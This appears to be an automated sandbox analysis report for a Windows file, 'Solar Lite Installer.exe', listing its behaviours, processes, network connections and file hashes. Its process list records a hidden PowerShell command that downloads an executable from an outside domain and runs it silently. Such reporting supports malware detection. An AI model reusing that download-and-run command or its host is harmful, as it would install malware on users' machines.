Analysis Overview
SHA256
007cfb9b07a76a2ad7280deb4cf9c88d1f7e7fcd59ba7c028bb47dd351e46498
Threat Level: Likely malicious
The file Solar Lite Installer.exe was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Unsigned PE
System Location Discovery: System Language Discovery
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Modifies registry class
Enumerates system info in registry
Checks processor information in registry
NTFS ADS
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 20:18
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 20:18
Reported
2024-11-13 20:20
Platform
win7-20240729-en
Max time kernel
118s
Max time network
121s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Solar Lite Installer.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\Solar Lite Installer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Local\Temp\Solar Lite Installer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\Users\Admin\AppData\Local\Temp\Solar Lite Installer.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Solar Lite Installer.exe
"C:\Users\Admin\AppData\Local\Temp\Solar Lite Installer.exe"
Network
Files
memory/2268-0-0x0000000074D7E000-0x0000000074D7F000-memory.dmp
memory/2268-1-0x0000000000B30000-0x0000000000C88000-memory.dmp
memory/2268-3-0x0000000074D70000-0x000000007545E000-memory.dmp
memory/2268-2-0x0000000004ED0000-0x00000000050E2000-memory.dmp
memory/2268-4-0x0000000074D70000-0x000000007545E000-memory.dmp
memory/2268-5-0x0000000074D7E000-0x0000000074D7F000-memory.dmp
memory/2268-6-0x0000000074D70000-0x000000007545E000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 20:18
Reported
2024-11-13 20:20
Platform
win10v2004-20241007-en
Max time kernel
129s
Max time network
139s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Solar Lite Installer.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\Users\Admin\AppData\Local\Temp\Solar Lite Installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\Solar Lite Installer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Local\Temp\Solar Lite Installer.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\dont run 123.txt:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Solar Lite Installer.exe
"C:\Users\Admin\AppData\Local\Temp\Solar Lite Installer.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1984 -parentBuildID 20240401114208 -prefsHandle 1912 -prefMapHandle 1904 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {774667a3-a354-4130-a53f-456280e15a27} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2396 -parentBuildID 20240401114208 -prefsHandle 2388 -prefMapHandle 2384 -prefsLen 23716 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {492f09ab-95eb-4f22-ae61-d4077b9e71f3} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3120 -childID 1 -isForBrowser -prefsHandle 3252 -prefMapHandle 3024 -prefsLen 23857 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {151078f0-b8ed-4fce-8767-6e1385421938} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4236 -childID 2 -isForBrowser -prefsHandle 4228 -prefMapHandle 3148 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7321953a-3d20-4ebf-ae99-fe4d6decc32d} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4916 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4936 -prefMapHandle 4932 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b5d3456-8072-434f-bcd5-7a25f46eb2fc} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5252 -childID 3 -isForBrowser -prefsHandle 5244 -prefMapHandle 5240 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3918bb71-4393-4f3d-913c-97352d49bf93} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5476 -childID 4 -isForBrowser -prefsHandle 5396 -prefMapHandle 5400 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {41a8e991-9a9d-43df-a62a-b06b13ed0007} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5492 -childID 5 -isForBrowser -prefsHandle 5600 -prefMapHandle 5604 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {01313a48-4183-4ad3-bfa4-c65567e1bc47} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6168 -childID 6 -isForBrowser -prefsHandle 6180 -prefMapHandle 6208 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {da85d81b-284f-4cae-ba60-48d8d3a4cac3} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" tab
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\dont run 123.txt
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\cmd.exe
cmd.exe /b /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://textpubshiers.top/Stb/PokerFace/BritneySpears005/Special/Sprdr44/theone.txt' -OutFile $env:APPDATA\hmx.exe; Start-Process -FilePath $env:APPDATA\hmx.exe -WindowStyle Hidden }
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://textpubshiers.top/Stb/PokerFace/BritneySpears005/Special/Sprdr44/theone.txt' -OutFile $env:APPDATA\hmx.exe; Start-Process -FilePath $env:APPDATA\hmx.exe -WindowStyle Hidden }
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| N/A | 127.0.0.1:52950 | tcp | |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| N/A | 127.0.0.1:52959 | tcp | |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.230.163.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.234.200.54.in-addr.arpa | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | gofile.io | udp |
| FR | 45.112.123.126:80 | gofile.io | tcp |
| US | 8.8.8.8:53 | gofile.io | udp |
| US | 8.8.8.8:53 | gofile.io | udp |
| US | 8.8.8.8:53 | 126.123.112.45.in-addr.arpa | udp |
| FR | 45.112.123.126:443 | gofile.io | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | s.gofile.io | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| US | 8.8.8.8:53 | s.gofile.io | udp |
| US | 8.8.8.8:53 | s.gofile.io | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| US | 8.8.8.8:53 | store10.gofile.io | udp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 8.8.8.8:53 | store10.gofile.io | udp |
| US | 8.8.8.8:53 | store10.gofile.io | udp |
| US | 8.8.8.8:53 | 252.70.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.242.75.51.in-addr.arpa | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | 201.181.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| GB | 88.221.134.209:80 | a19.dscg10.akamai.net | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | 209.134.221.88.in-addr.arpa | udp |
| US | 35.190.72.216:443 | location.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 35.190.72.216:443 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.169.78:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.169.78:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | 216.72.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.169.78:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r4---sn-aigzrnsz.gvt1.com | udp |
| US | 8.8.8.8:53 | 78.169.217.172.in-addr.arpa | udp |
| GB | 74.125.175.169:443 | r4---sn-aigzrnsz.gvt1.com | tcp |
| US | 8.8.8.8:53 | r4.sn-aigzrnsz.gvt1.com | udp |
| US | 8.8.8.8:53 | r4.sn-aigzrnsz.gvt1.com | udp |
| GB | 74.125.175.169:443 | r4.sn-aigzrnsz.gvt1.com | udp |
| US | 8.8.8.8:53 | 169.175.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
Files
memory/1428-0-0x000000007454E000-0x000000007454F000-memory.dmp
memory/1428-1-0x0000000000B00000-0x0000000000C58000-memory.dmp
memory/1428-2-0x0000000005DB0000-0x0000000006354000-memory.dmp
memory/1428-3-0x0000000005610000-0x00000000056A2000-memory.dmp
memory/1428-4-0x00000000057B0000-0x00000000057BA000-memory.dmp
memory/1428-5-0x0000000074540000-0x0000000074CF0000-memory.dmp
memory/1428-6-0x0000000005870000-0x0000000005A82000-memory.dmp
memory/1428-7-0x0000000074540000-0x0000000074CF0000-memory.dmp
memory/1428-8-0x000000007454E000-0x000000007454F000-memory.dmp
memory/1428-9-0x0000000074540000-0x0000000074CF0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\pending_pings\b776c99b-e2de-42f4-8bfb-ec693f5d6c99
| MD5 | 96929ae080de60c87a9e0c73407b8462 |
| SHA1 | 1745a7ee43a40fd1404ec3b9f3b638e4642e9b79 |
| SHA256 | eb47ef38eb4f6aa7ef61c72ee4080c21e6909b5c88717c888b389e2826719812 |
| SHA512 | 57e4be053cfcfef207e1788574e70f1e7d4554c9e585ee10b48e43e60cf92b5872aa2b921e7399b32999557d485f2ca7e1535ac8408e77e16cae44f101794910 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\pending_pings\1d960455-d576-47f2-a377-d71ee75512d3
| MD5 | 8cfa83310c6fd3f892682860b0dfd434 |
| SHA1 | ca063cd7109477126d8dd0c82ba7e03be6d62bf0 |
| SHA256 | 8686254c7702a7f123f88525117a96ed5269d769f3128639a3efbc56bc8fb133 |
| SHA512 | 63673cc596e06cc890e69de917b7e7f1bf4e12362bd78fc84f4daa6a00a84c6638dd11492198ec6f1c449f0a7a576216c571a51f4f1a5d44b99ded6ba94ae547 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\pending_pings\6c36772d-2eb5-462a-ae89-5235c8e9ca6a
| MD5 | b1575b8509ce5c5f7851b1898c91daa7 |
| SHA1 | 53559aa981010fa82bedf092188ab4de19405fc4 |
| SHA256 | 9675be150838cc27b7591098185a1998ac3f57752c3114766126f413c0a700cf |
| SHA512 | 31ed3946649ed16f9f58db245c3e31056109b0e3affcb2c0616654909ace7ea38bed4fb6bb55a3c2eff6184ac16644e446b52c8194601be3989f42ab55f6cf66 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 75b68a1e8941c261b5ee3dfa7921400b |
| SHA1 | a8d3e1dcfaa10a666b5053451c4acd1746510ff3 |
| SHA256 | d930c5ec4b7b1e0b18a5ca83651a3afd32a8a02140863f11cb5784271d709d3a |
| SHA512 | 5a39024fc91d6a6ae0ae44eff8912036a56b8a15659688b5351ab748f3590e46123cbe3c165530c9a558aa25c8dbd14c22acabe1ad4a90649587a7e388703d6e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\prefs.js
| MD5 | c28f966b0b7803bbbbaf7b039aef54a8 |
| SHA1 | db96f7c0c0ef1bb1d05dd3bdbe830f6f263947ea |
| SHA256 | 2305bbe40ed5de5d5f9372869139a4f35ca3a29cb9d54a6d377bf1857c2d7794 |
| SHA512 | fc635f6e99c70a945a66212160543380f077f71c40fe09bf39f861d06147821aedb34defb0e8b4e046dd6818dada25cf1071e8c9a0a69ffd64f6b035faadb99e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 1a7a0ed0a017b757603b8603b34ee061 |
| SHA1 | 1eea08a3067655a6327c0b10d925f0fc06182d20 |
| SHA256 | 1b31833528bda398ffda30430e8bef87b87e28da0e64dd5ff77bbfd84c269aab |
| SHA512 | 16600a3b45a225254e180186c4f8266befdcedd8fafbfdb7358909716a1ae20d31f4d38776fb4664ac3ea0169121af5c80b559d72137d513193631187f7a83a1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\prefs-1.js
| MD5 | 237fa97c9681f9b64bbf0415ea664596 |
| SHA1 | 86c30708eee1e9038384835706643a1a6115d48c |
| SHA256 | a79ea6c12fdeb5aedb4cc651d78ea8356f13b3a36d77fa881e22acfe5b9bd66b |
| SHA512 | 041d1746dbddeeb152623150ddb16b74b9e81608b23ef3e9d6bd836ca3910bf7f600188bb3642fae28da6ead197852b4a6241c0af1a25b52a5aa389e68ae24a3 |
C:\Users\Admin\Downloads\QlhJoBFE.txt.part
| MD5 | 0abb417fdf86d568e4befd753706adf6 |
| SHA1 | 48f29ecf696281170075952e449c6b8fc7825b11 |
| SHA256 | 3ac3f11532f9004446297f1f20eeacb523b9952aee1116f9561f3dfd705c1452 |
| SHA512 | d3d4c7f36a160a54068ca51ff717e0ddf983162b789cf9b6ac2da89315622725f24b0f189d52760496a84fb8a74846274e5b551f1908fabb81822f62af04dc82 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | e4c0788b779b6a0074935df2f1173e4a |
| SHA1 | d400d1a2fd21a75e2581adcf12bb97528a77da32 |
| SHA256 | baa46a1432c3a9b1105ba0c664c13516ccbd42ff7565be9a658f62d1f2bb9bca |
| SHA512 | 8705ae84993eb8140e6f33e290a2366a863bf2fc2f0518c41ca1fd0fb88f8bf573bccafe229fe802a4561d9156fa2b74a462efe97641a254384bba0462431e7b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\prefs-1.js
| MD5 | b8b598b5c0376b7620255421aef8936e |
| SHA1 | d5c7b7227e3b78d6d46058590f25f777e7e5591c |
| SHA256 | ee81f8cf532153a536295b79a1ee20d5bd722097f34d255ab6b186c64f20b0cb |
| SHA512 | 196c6712f02038a7e4738ab2da7cc0c8c920d233242da28c67139eb16721e8fc75b014a5ee21ffe414bfa5b57eff6acaa72ac4179cbd8dbe30ba8247f845aed0 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\sessionstore-backups\recovery.baklz4
| MD5 | a9abf122efe0102d016010cc81a8336d |
| SHA1 | af5890cf5f56329782edc1ba42957831d51d360f |
| SHA256 | 5db02475215ded643cf64428dbe2fad745a894388fc6ef5c118aac109f952a86 |
| SHA512 | 7ea240e1ebd742a0a6f9482c3c09bddb89f05fff792ae41739e693718ab8f7e2d5f4473c1a9ca01b2ac1943febaa0a65a3087eddf5ff87c224fdb7b398c2b2cd |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 09372174e83dbbf696ee732fd2e875bb |
| SHA1 | ba360186ba650a769f9303f48b7200fb5eaccee1 |
| SHA256 | c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f |
| SHA512 | b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
| MD5 | 2a461e9eb87fd1955cea740a3444ee7a |
| SHA1 | b10755914c713f5a4677494dbe8a686ed458c3c5 |
| SHA256 | 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc |
| SHA512 | 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
| MD5 | 842039753bf41fa5e11b3a1383061a87 |
| SHA1 | 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153 |
| SHA256 | d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c |
| SHA512 | d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\AlternateServices.bin
| MD5 | 21f90a5c6795feeae237eb3ecef433f7 |
| SHA1 | 0f0f139a6f902e75a10a9c2c7ec66132cc998ee5 |
| SHA256 | f185dd968e58fb294a3a113ff87cb37257d19b68df1826836e21677bd77a604a |
| SHA512 | 78981bfd4eec3817e295081fbae6503e87f34196042e09c59f1b2959cc411de9cbcc00e8bac5403e794dfca53dd55415e3bf24e59b6346fd4d5a4c56de3050c8 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | 0a8747a2ac9ac08ae9508f36c6d75692 |
| SHA1 | b287a96fd6cc12433adb42193dfe06111c38eaf0 |
| SHA256 | 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03 |
| SHA512 | 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
| MD5 | bf957ad58b55f64219ab3f793e374316 |
| SHA1 | a11adc9d7f2c28e04d9b35e23b7616d0527118a1 |
| SHA256 | bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda |
| SHA512 | 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
| MD5 | daf7ef3acccab478aaa7d6dc1c60f865 |
| SHA1 | f8246162b97ce4a945feced27b6ea114366ff2ad |
| SHA256 | bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e |
| SHA512 | 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\prefs-1.js
| MD5 | d5d91e5f4cbc00f82ca7655b0d53c830 |
| SHA1 | 75db931177a347217188e2b6aff810e669682151 |
| SHA256 | 01740953faa8cb5e295f0711ddb157b4a0df79a93f31a9b2ffe16a76c06d694e |
| SHA512 | 30025e292168e700faf22cc053442d0d83d85cac8ed4a8e1e58543d4e04fa6689ed355f6783892e4957e575e53380ceefa9e9e68bf3074f653da4f75d6e0bb48 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3jp53ogr.qxb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
